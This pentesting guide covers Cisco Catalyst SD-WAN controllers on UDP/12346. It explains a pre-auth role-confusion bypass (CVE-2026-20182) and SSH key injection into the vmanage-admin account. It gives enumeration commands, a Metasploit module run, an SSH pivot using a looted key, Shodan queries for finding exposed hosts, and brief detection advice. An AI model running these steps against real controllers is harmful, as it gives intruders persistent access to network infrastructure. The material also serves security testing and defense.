12346/udp - Pentesting Cisco Catalyst SD-WAN Control Plane

Basic Information

Cisco Catalyst SD-WAN controllers expose a DTLS control-plane service on UDP/12346 (vdaemon). This service should be treated like a routing-adjacency surface: if an attacker can become an authenticated peer, they may be able to pivot into the overlay fabric.

vdaemon uses a 12-byte header where the high nibble of device_info encodes the claimed device role:

The DTLS handshake is not enough to authenticate a peer by itself. Peer trust is finalized later during control-plane bootstrap messages such as CHALLENGE_ACK.

Default port: 12346/udp

PORT      STATE SERVICE
12346/udp open  unknown

Enumeration

Discover the control-plane service and follow-on management ports:

nmap -sU -p12346 <IP>
nmap -sT -p22,830 <IP>

If the host exposes TCP/830, check whether NETCONF over SSH is reachable:

ssh -p 830 <user>@<IP>

Pentesting Cisco SD-WAN Control Plane

Pre-auth Role Confusion

CHALLENGE_ACK (message type 9) is reachable before authentication because it is part of the control-plane bootstrap allowlist. In CVE-2026-20182, Rapid7 showed that vbond_proc_challenge_ack() verified some roles (vEdge, vSmart, vManage) but had no verification branch for claimed role 2 / vHub.

Because the function later fell through to peer->authenticated = 1, an attacker could:

1. Complete DTLS with any certificate.
2. Send CHALLENGE_ACK with the high nibble of device_info set to 2.
3. Send Hello.
4. Transition to an UP authenticated peer.

This is a useful bug pattern to hunt in proprietary control planes: attacker-controlled role selection, missing default-deny validation, and pre-auth handshake messages.

Post-auth Pivot

Once treated as an authenticated peer, the controller accepted MSG_VMANAGE_TO_PEER (message type 14) and appended attacker-controlled data to /home/vmanage-admin/.ssh/authorized_keys.

This turns a control-plane foothold into persistent NETCONF over SSH access on TCP/830 as vmanage-admin.

# Rapid7 module automating the vHub auth bypass and SSH key injection
msf6 > use auxiliary/admin/networking/cisco_sdwan_vhub_auth_bypass
msf6 auxiliary(cisco_sdwan_vhub_auth_bypass) > set RHOSTS <IP>
msf6 auxiliary(cisco_sdwan_vhub_auth_bypass) > run

# If the target accepts the injected key, pivot to NETCONF over SSH
ssh -i <loot_key.pem> vmanage-admin@<IP> -p 830

Review similar appliances for post-auth messages that write SSH keys, API tokens, trust bundles, or bootstrap secrets for privileged internal service accounts.

Detection

• Audit Internet-facing or cross-trust-boundary exposure of UDP/12346 and TCP/830.
• Inspect /home/vmanage-admin/.ssh/authorized_keys for unexpected appended keys after control-plane events.
• After gaining NETCONF, remember that configuration and state retrieval may be available even if a normal shell is not.

Shodan

• port:12346
• port:830 "NETCONF"

References

• Rapid7: CVE-2026-20182 - Critical authentication bypass in Cisco Catalyst SD-WAN Controller
• Cisco Security Advisory: Cisco Catalyst SD-WAN Controller Authentication Bypass Vulnerability